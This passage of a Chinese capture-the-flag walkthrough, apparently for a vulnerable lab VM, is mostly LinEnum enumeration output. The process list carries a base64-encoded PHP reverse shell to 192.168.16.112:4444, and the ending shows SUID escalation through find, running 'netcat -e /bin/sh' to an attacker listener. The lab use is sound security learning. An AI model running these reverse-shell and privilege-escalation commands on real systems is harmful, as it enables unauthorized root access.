0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_20] 1023 root 153 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_21] 1024 root 154 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_22] 1025 root 155 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_23] 1026 root 156 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_24] 1027 root 157 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_25] 1028 root 158 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_26] 1029 root 159 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_27] 1030 root 160 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_28] 1031 root 161 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_29] 1032 root 162 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_30] 1033 root 163 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_31] 1034 root 190 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:29] 1035 root 191 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:30] 1036 root 308 0.0 0.0 0 0 ? S 00:08 0:00 [jbd2/sda1-8] 1037 root 309 0.0 0.0 0 0 ? S< 00:08 0:00 [ext4-dio-unwrit] 1038 root 458 0.0 0.1 2688 1244 ? Ss 00:08 0:00 udevd --daemon 1039 root 543 0.0 0.0 0 0 ? S< 00:08 0:00 [ttm_swap] 1040 root 699 0.0 0.0 0 0 ? S< 00:08 0:00 [kpsmoused] 1041 root 1866 0.0 0.0 2388 904 ? Ss 00:08 0:00 /sbin/rpcbind -w 1042 statd 1897 0.0 0.1 2660 1280 ? Ss 00:08 0:00 /sbin/rpc.statd 1043 root 1902 0.0 0.0 2684 888 ? S 00:08 0:00 udevd --daemon 1044 root 1903 0.0 0.0 0 0 ? S< 00:08 0:00 [rpciod] 1045 root 1905 0.0 0.0 0 0 ? S< 00:08 0:00 [nfsiod] 1046 root 1912 0.0 0.0 2592 568 ? Ss 00:08 0:00 /usr/sbin/rpc.idmapd 1047 root 2215 0.0 0.2 28352 2080 ? Sl 00:08 0:00 /usr/sbin/rsyslogd -c5 1048 root 2267 0.0 0.0 1892 608 ? Ss 00:08 0:00 /usr/sbin/acpid 1049 root 2303 0.0 0.8 43680 8928 ? Ss 00:08 0:00 /usr/sbin/apache2 -k start 1050 daemon 2347 0.0 0.0 2168 316 ? Ss 00:08 0:00 /usr/sbin/atd 1051 103 2353 0.0 0.0 3032 644 ? Ss 00:08 0:00 /usr/bin/dbus-daemon --system 1052 www-data 2381 0.0 1.3 48448 14420 ? S 00:08 0:00 /usr/sbin/apache2 -k start 1053 www-data 2382 0.0 1.2 47424 13408 ? S 00:08 0:00 /usr/sbin/apache2 -k start 1054 www-data 2383 0.0 1.4 47676 14836 ? S 00:08 0:01 /usr/sbin/apache2 -k start 1055 www-data 2384 0.0 1.1 46148 12080 ? S 00:08 0:00 /usr/sbin/apache2 -k start 1056 root 2438 0.0 0.0 3852 988 ? Ss 00:08 0:00 /usr/sbin/cron 1057 root 2493 0.0 0.0 1948 588 ? S 00:08 0:00 /bin/sh /usr/bin/mysqld_safe 1058 mysql 2831 0.0 4.7 329380 49184 ? Sl 00:08 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306 1059 root 2832 0.0 0.0 1868 604 ? S 00:08 0:00 logger -t mysqld -p daemon.error 1060 101 3228 0.0 0.0 7424 992 ? Ss 00:08 0:00 /usr/sbin/exim4 -bd -q30m 1061 root 3281 0.0 0.0 3796 840 tty2 Ss+ 00:08 0:00 /sbin/getty 38400 tty2 1062 root 3282 0.0 0.0 3796 836 tty3 Ss+ 00:08 0:00 /sbin/getty 38400 tty3 1063 root 3283 0.0 0.0 3796 840 tty4 Ss+ 00:08 0:00 /sbin/getty 38400 tty4 1064 root 3284 0.0 0.0 3796 836 tty5 Ss+ 00:08 0:00 /sbin/getty 38400 tty5 1065 root 3285 0.0 0.0 3796 840 tty6 Ss+ 00:08 0:00 /sbin/getty 38400 tty6 1066 root 3287 0.0 0.0 0 0 ? S 00:08 0:00 [flush-8:0] 1067 root 3298 0.0 0.2 5196 2356 ? Ss 00:08 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0 1068 root 3339 0.0 0.1 6496 1076 ? Ss 00:08 0:00 /usr/sbin/sshd 1069 root 3354 0.0 0.0 3796 840 tty1 Ss+ 00:09 0:00 /sbin/getty 38400 tty1 1070 www-data 3358 0.0 1.5 49688 15620 ? S 00:18 0:00 /usr/sbin/apache2 -k start 1071 www-data 3360 0.0 1.1 45892 11832 ? S 00:18 0:00 /usr/sbin/apache2 -k start 1072 www-data 3361 0.0 1.6 51624 16812 ? S 00:18 0:00 /usr/sbin/apache2 -k start 1073 www-data 3381 0.0 1.1 45892 11828 ? S 00:32 0:00 /usr/sbin/apache2 -k start 1074 www-data 3385 0.0 1.2 47436 13392 ? S 00:32 0:00 /usr/sbin/apache2 -k start 1075 www-data 3386 0.0 1.2 47416 13320 ? S 00:32 0:00 /usr/sbin/apache2 -k start 1076 www-data 3405 0.0 0.0 1948 540 ? S 00:39 0:00 sh -c php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));' 1077 www-data 3406 0.0 0.8 41132 9032 ? S 00:39 0:01 php -r eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs)); 1078 www-data 3408 0.0 0.0 1948 520 ? S 00:40 0:00 sh -c /bin/sh 1079 www-data 3409 0.0 0.0 1948 576 ? S 00:40 0:00 /bin/sh 1080 root 3488 0.0 0.0 0 0 ? S 01:01 0:00 [kworker/0:1] 1081 root 4393 0.0 0.0 0 0 ? S 01:07 0:00 [kworker/0:2] 1082 www-data 4398 0.0 0.2 3824 2088 ? S 01:08 0:00 /bin/bash ./LinEnum.sh 1083 www-data 4857 0.0 0.1 3876 1696 ? S 01:08 0:00 /bin/bash ./LinEnum.sh 1084 www-data 4858 0.0 0.0 1876 448 ? S 01:08 0:00 tee -a 1085 www-data 5028 0.0 0.1 3860 1416 ? S 01:08 0:00 /bin/bash ./LinEnum.sh 1086 www-data 5029 0.0 0.0 2832 996 ? R 01:08 0:00 ps aux 1087 1088 1089 [00;31m[-] Process binaries and associated permissions (from above list):[00m 1090 -rwxr-xr-x 1 root root 941252 Oct 27 2016 /bin/bash 1091 lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash 1092 -rwxr-xr-x 2 root root 26684 Dec 10 2012 /sbin/getty 1093 -rwxr-xr-x 1 root root 68180 May 22 2013 /sbin/rpc.statd 1094 -rwxr-xr-x 1 root root 42836 May 10 2017 /sbin/rpcbind 1095 -rwxr-xr-x 1 root root 436576 Feb 10 2015 /usr/bin/dbus-daemon 1096 -rwxr-xr-x 1 root root 42748 Apr 16 2013 /usr/sbin/acpid 1097 lrwxrwxrwx 1 root root 34 May 30 2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2 1098 -rwxr-xr-x 1 root root 21812 Oct 4 2014 /usr/sbin/atd 1099 -rwxr-xr-x 1 root root 43020 Jul 4 2012 /usr/sbin/cron 1100 -rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4 1101 -rwxr-xr-x 1 root root 10585256 Apr 20 2018 /usr/sbin/mysqld 1102 -rwxr-xr-x 1 root root 28832 May 22 2013 /usr/sbin/rpc.idmapd 1103 -rwxr-xr-x 1 root root 388200 Oct 8 2014 /usr/sbin/rsyslogd 1104 -rwxr-xr-x 1 root root 531888 Jan 27 2018 /usr/sbin/sshd 1105 1106 1107 [00;31m[-] /etc/init.d/ binary permissions:[00m 1108 total 280 1109 drwxr-xr-x 2 root root 4096 Feb 19 23:01 . 1110 drwxr-xr-x 85 root root 4096 May 7 01:08 .. 1111 -rw-r--r-- 1 root root 1586 Feb 19 23:02 .depend.boot 1112 -rw-r--r-- 1 root root 669 Feb 19 23:02 .depend.start 1113 -rw-r--r-- 1 root root 769 Feb 19 23:02 .depend.stop 1114 -rw-r--r-- 1 root root 2427 Oct 16 2012 README 1115 -rwxr-xr-x 1 root root 2227 Apr 16 2013 acpid 1116 -rwxr-xr-x 1 root root 7820 May 26 2018 apache2 1117 -rwxr-xr-x 1 root root 1071 Jun 25 2011 atd 1118 -rwxr-xr-x 1 root root 1276 Oct 16 2012 bootlogs 1119 -rwxr-xr-x 1 root root 1281 Jul 15 2013 bootmisc.sh 1120 -rwxr-xr-x 1 root root 3816 Jul 15 2013 checkfs.sh 1121 -rwxr-xr-x 1 root root 1099 Jul 15 2013 checkroot-bootclean.sh 1122 -rwxr-xr-x 1 root root 9673 Jul 15 2013 checkroot.sh 1123 -rwxr-xr-x 1 root root 1379 Dec 9 2011 console-setup 1124 -rwxr-xr-x 1 root root 3033 Jul 3 2012 cron 1125 -rwxr-xr-x 1 root root 2813 Feb 6 2015 dbus 1126 -rwxr-xr-x 1 root root 6435 Feb 11 2018 exim4 1127 -rwxr-xr-x 1 root root 1329 Oct 16 2012 halt 1128 -rwxr-xr-x 1 root root 1423 Oct 16 2012 hostname.sh 1129 -rwxr-xr-x 1 root root 3880 Dec 10 2012 hwclock.sh 1130 -rwxr-xr-x 1 root root 7592 Apr 28 2012 kbd 1131 -rwxr-xr-x 1 root root 1591 Oct 1 2012 keyboard-setup 1132 -rwxr-xr-x 1 root root 1293 Oct 16 2012 killprocs 1133 -rwxr-xr-x 1 root root 1990 May 21 2012 kmod 1134 -rwxr-xr-x 1 root root 2405 Sep 26 2016 mcstrans 1135 -rwxr-xr-x 1 root root 995 Oct 16 2012 motd 1136 -rwxr-xr-x 1 root root 670 Feb 24 2013 mountall-bootclean.sh 1137 -rwxr-xr-x 1 root root 2128 Feb 24 2013 mountall.sh 1138 -rwxr-xr-x 1 root root 1508 Jul 15 2013 mountdevsubfs.sh 1139 -rwxr-xr-x 1 root root 1413 Jul 15 2013 mountkernfs.sh 1140 -rwxr-xr-x 1 root root 678 Feb 24 2013 mountnfs-bootclean.sh 1141 -rwxr-xr-x 1 root root 2440 Oct 16 2012 mountnfs.sh 1142 -rwxr-xr-x 1 root root 1731 Jul 15 2013 mtab.sh 1143 -rwxr-xr-x 1 root root 5437 Apr 19 2018 mysql 1144 -rwxr-xr-x 1 root root 4322 Mar 14 2013 networking 1145 -rwxr-xr-x 1 root root 6491 May 22 2013 nfs-common 1146 -rwxr-xr-x 1 root root 1346 May 20 2012 procps 1147 -rwxr-xr-x 1 root root 6120 Oct 16 2012 rc 1148 -rwxr-xr-x 1 root root 782 Oct 16 2012 rc.local 1149 -rwxr-xr-x 1 root root 117 Oct 16 2012 rcS 1150 -rwxr-xr-x 1 root root 639 Oct 16 2012 reboot 1151 -rwxr-xr-x 1 root root 2727 Sep 26 2016 restorecond 1152 -rwxr-xr-x 1 root root 1074 Jul 15 2013 rmnologin 1153 -rwxr-xr-x 1 root root 2344 May 10 2017 rpcbind 1154 -rwxr-xr-x 1 root root 3054 Oct 8 2014 rsyslog 1155 -rwxr-xr-x 1 root root 3200 Oct 16 2012 sendsigs 1156 -rwxr-xr-x 1 root root 590 Oct 16 2012 single 1157 -rw-r--r-- 1 root root 4290 Oct 16 2012 skeleton 1158 -rwxr-xr-x 1 root root 3881 Apr 15 2016 ssh 1159 -rwxr-xr-x 1 root root 8827 Nov 9 2012 udev 1160 -rwxr-xr-x 1 root root 1179 Aug 20 2012 udev-mtab 1161 -rwxr-xr-x 1 root root 2721 Apr 10 2013 umountfs 1162 -rwxr-xr-x 1 root root 2195 Apr 10 2013 umountnfs.sh 1163 -rwxr-xr-x 1 root root 1122 Oct 16 2012 umountroot 1164 -rwxr-xr-x 1 root root 3111 Oct 16 2012 urandom 1165 -rwxr-xr-x 1 root root 1364 Oct 26 2015 virtualbox-guest-utils 1166 -rwxr-xr-x 1 root root 2666 Mar 3 2012 x11-common 1167 1168 1169 [00;31m[-] /etc/init/ config file permissions:[00m 1170 total 48 1171 drwxr-xr-x 2 root root 4096 Feb 19 22:25 . 1172 drwxr-xr-x 85 root root 4096 May 7 01:08 .. 1173 -rw-r--r-- 1 root root 523 Mar 14 2013 network-interface-container.conf 1174 -rw-r--r-- 1 root root 1603 Mar 14 2013 network-interface-security.conf 1175 -rw-r--r-- 1 root root 803 Mar 14 2013 network-interface.conf 1176 -rw-r--r-- 1 root root 1898 Mar 14 2013 networking.conf 1177 -rw-r--r-- 1 root root 567 Feb 24 2013 startpar-bridge.conf 1178 -rw-r--r-- 1 root root 637 Nov 5 2012 udev-fallback-graphics.conf 1179 -rw-r--r-- 1 root root 769 Nov 5 2012 udev-finish.conf 1180 -rw-r--r-- 1 root root 322 Nov 5 2012 udev.conf 1181 -rw-r--r-- 1 root root 356 Nov 5 2012 udevmonitor.conf 1182 -rw-r--r-- 1 root root 352 Nov 5 2012 udevtrigger.conf 1183 1184 1185 [00;31m[-] /lib/systemd/* config file permissions:[00m 1186 /lib/systemd/: 1187 total 4.0K 1188 drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system 1189 1190 /lib/systemd/system: 1191 total 56K 1192 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants 1193 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants 1194 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants 1195 drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants 1196 -rw-r--r-- 1 root root 353 Feb 10 2015 dbus.service 1197 -rw-r--r-- 1 root root 106 Feb 10 2015 dbus.socket 1198 -rw-r--r-- 1 root root 190 Oct 8 2014 rsyslog.service 1199 -rw-r--r-- 1 root root 164 Apr 29 2013 udev-control.socket 1200 -rw-r--r-- 1 root root 177 Apr 29 2013 udev-kernel.socket 1201 -rw-r--r-- 1 root root 752 Apr 29 2013 udev-settle.service 1202 -rw-r--r-- 1 root root 291 Apr 29 2013 udev-trigger.service 1203 -rw-r--r-- 1 root root 384 Apr 29 2013 udev.service 1204 -rw-r--r-- 1 root root 155 Apr 16 2013 acpid.service 1205 -rw-r--r-- 1 root root 115 Apr 16 2013 acpid.socket 1206 1207 /lib/systemd/system/dbus.target.wants: 1208 total 0 1209 lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket 1210 1211 /lib/systemd/system/multi-user.target.wants: 1212 total 0 1213 lrwxrwxrwx 1 root root 15 Feb 10 2015 dbus.service -> ../dbus.service 1214 1215 /lib/systemd/system/sockets.target.wants: 1216 total 0 1217 lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket 1218 lrwxrwxrwx 1 root root 22 Apr 29 2013 udev-control.socket -> ../udev-control.socket 1219 lrwxrwxrwx 1 root root 21 Apr 29 2013 udev-kernel.socket -> ../udev-kernel.socket 1220 1221 /lib/systemd/system/basic.target.wants: 1222 total 0 1223 lrwxrwxrwx 1 root root 23 Apr 29 2013 udev-trigger.service -> ../udev-trigger.service 1224 lrwxrwxrwx 1 root root 15 Apr 29 2013 udev.service -> ../udev.service 1225 1226 1227 [00;33m### SOFTWARE #############################################[00m 1228 [00;31m[-] MYSQL version:[00m 1229 mysql Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2 1230 1231 1232 [00;31m[-] Apache user configuration:[00m 1233 APACHE_RUN_USER=www-data 1234 APACHE_RUN_GROUP=www-data 1235 1236 1237 [00;33m### INTERESTING FILES ####################################[00m 1238 [00;31m[-] Useful file locations:[00m 1239 /bin/nc 1240 /bin/netcat 1241 /usr/bin/wget 1242 /usr/bin/gcc 1243 /usr/bin/curl 1244 1245 1246 [00;31m[-] Installed compilers:[00m 1247 ii checkpolicy 2.1.8-2 i386 SELinux policy compiler 1248 ii gcc 4:4.7.2-1 i386 GNU C compiler 1249 ii gcc-4.7 4.7.2-5 i386 GNU C compiler 1250 ii gcc-4.7-multilib 4.7.2-5 i386 GNU C compiler (multilib files) 1251 ii gcc-multilib 4:4.7.2-1 i386 GNU C compiler (multilib files) 1252 1253 1254 [00;31m[-] Can we read/write sensitive files:[00m 1255 -rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd 1256 -rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group 1257 -rw-r--r-- 1 root root 851 Jul 30 2011 /etc/profile 1258 -rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow 1259 1260 1261 [00;31m[-] SUID files:[00m 1262 -rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount 1263 -rwsr-xr-x 1 root root 31104 Apr 13 2011 /bin/ping 1264 -rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su 1265 -rwsr-xr-x 1 root root 35252 Apr 13 2011 /bin/ping6 1266 -rwsr-xr-x 1 root root 67704 Dec 10 2012 /bin/umount 1267 -rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at 1268 -rwsr-xr-x 1 root root 35892 Feb 27 2017 /usr/bin/chsh 1269 -rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd 1270 -rwsr-xr-x 1 root root 30880 Feb 27 2017 /usr/bin/newgrp 1271 -rwsr-xr-x 1 root root 44564 Feb 27 2017 /usr/bin/chfn 1272 -rwsr-xr-x 1 root root 66196 Feb 27 2017 /usr/bin/gpasswd 1273 -rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail 1274 -rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find 1275 -rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4 1276 -rwsr-xr-x 1 root root 9660 Jun 20 2017 /usr/lib/pt_chown 1277 -rwsr-xr-x 1 root root 248036 Jan 27 2018 /usr/lib/openssh/ssh-keysign 1278 -rwsr-xr-x 1 root root 5412 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device 1279 -rwsr-xr-- 1 root messagebus 321692 Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper 1280 -rwsr-xr-x 1 root root 84532 May 22 2013 /sbin/mount.nfs 1281 1282 1283 [00;33m[+] Possibly interesting SUID files:[00m 1284 -rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find 1285 1286 1287 [00;31m[-] SGID files:[00m 1288 -rwxr-sr-x 1 root ssh 128396 Jan 27 2018 /usr/bin/ssh-agent 1289 -rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at 1290 -rwxr-sr-x 1 root mlocate 30492 Sep 25 2010 /usr/bin/mlocate 1291 -rwxr-sr-x 1 root mail 17908 Nov 18 2017 /usr/bin/lockfile 1292 -rwxr-sr-x 1 root shadow 49364 Feb 27 2017 /usr/bin/chage 1293 -rwxr-sr-x 1 root tty 9708 Jun 11 2012 /usr/bin/bsd-write 1294 -rwxr-sr-x 1 root mail 9768 Nov 30 2014 /usr/bin/mutt_dotlock 1295 -rwxr-sr-x 1 root tty 18020 Dec 10 2012 /usr/bin/wall 1296 -rwxr-sr-x 1 root crontab 34760 Jul 4 2012 /usr/bin/crontab 1297 -rwxr-sr-x 1 root shadow 18168 Feb 27 2017 /usr/bin/expiry 1298 -rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail 1299 -rwxr-sr-x 1 root mail 13960 Dec 12 2012 /usr/bin/dotlockfile 1300 -rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter 1301 -rwxr-sr-x 1 root shadow 30332 May 5 2012 /sbin/unix_chkpwd 1302 1303 1304 [-] Can't search *.conf files as no keyword was entered 1305 1306 [-] Can't search *.php files as no keyword was entered 1307 1308 [-] Can't search *.log files as no keyword was entered 1309 1310 [-] Can't search *.ini files as no keyword was entered 1311 1312 [00;31m[-] All *.conf files in /etc (recursive 1 level):[00m 1313 -rw-r--r-- 1 root root 45 May 7 01:08 /etc/resolv.conf 1314 -rw-r--r-- 1 root root 346 Mar 31 2012 /etc/discover-modprobe.conf 1315 -rw-r--r-- 1 root root 216 Sep 26 2016 /etc/sestatus.conf 1316 -rw-r--r-- 1 root root 1260 May 30 2008 /etc/ucf.conf 1317 -rw-r--r-- 1 root root 834 Jun 8 2012 /etc/gssapi_mech.conf 1318 -rw-r--r-- 1 root root 859 Nov 24 2012 /etc/insserv.conf 1319 -rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf 1320 -rw-r--r-- 1 root root 3173 Dec 16 2017 /etc/reportbug.conf 1321 -rw-r--r-- 1 root root 599 Feb 19 2009 /etc/logrotate.conf 1322 -rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf 1323 -rw-r--r-- 1 root root 284 Sep 25 2010 /etc/updatedb.conf 1324 -rw-r--r-- 1 root root 191 Feb 1 2012 /etc/libaudit.conf 1325 -rw-r--r-- 1 root root 604 May 16 2012 /etc/deluser.conf 1326 -rw-r--r-- 1 root root 2940 Feb 12 2016 /etc/gai.conf 1327 -rw-r--r-- 1 root root 2632 Oct 8 2014 /etc/rsyslog.conf 1328 -rw-r--r-- 1 root root 2082 May 20 2012 /etc/sysctl.conf 1329 -rw-r--r-- 1 root root 214 May 11 2013 /etc/idmapd.conf 1330 -rw-r--r-- 1 root root 956 Feb 22 2015 /etc/mke2fs.conf 1331 -rw-r--r-- 1 root root 552 Apr 30 2012 /etc/pam.conf 1332 -rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf 1333 -rw-r--r-- 1 root root 2969 Dec 26 2012 /etc/debconf.conf 1334 -rw-r--r-- 1 root root 9 Aug 8 2006 /etc/host.conf 1335 -rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf 1336 -rw-r--r-- 1 root root 475 Aug 29 2006 /etc/nsswitch.conf 1337 1338 1339 [00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m 1340 /home/flag4/.bash_history 1341 cd 1342 ls 1343 vi flag4.txt 1344 ls 1345 exit 1346 1347 1348 [00;31m[-] Any interesting mail in /var/mail:[00m 1349 total 8 1350 drwxrwsr-x 2 root mail 4096 Feb 19 22:24 . 1351 drwxr-xr-x 12 root root 4096 Feb 19 23:10 .. 1352 1353 1354 [00;33m### SCAN COMPLETE ####################################[00m
发现了弱点尝试进行suid提权
参考文章https://pentestlab.blog/2017/09/25/suid-executables/
find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \;
反弹shell
攻击机
root@panli:~# nc -lvvp 8999 listening on [any] 8999 ...
在meterpreter的shell中执行find suidtest -exec netcat -e /bin/sh 192.168.0.117 8999 \;
成功提权
已为社区贡献2条内容
所有评论(0)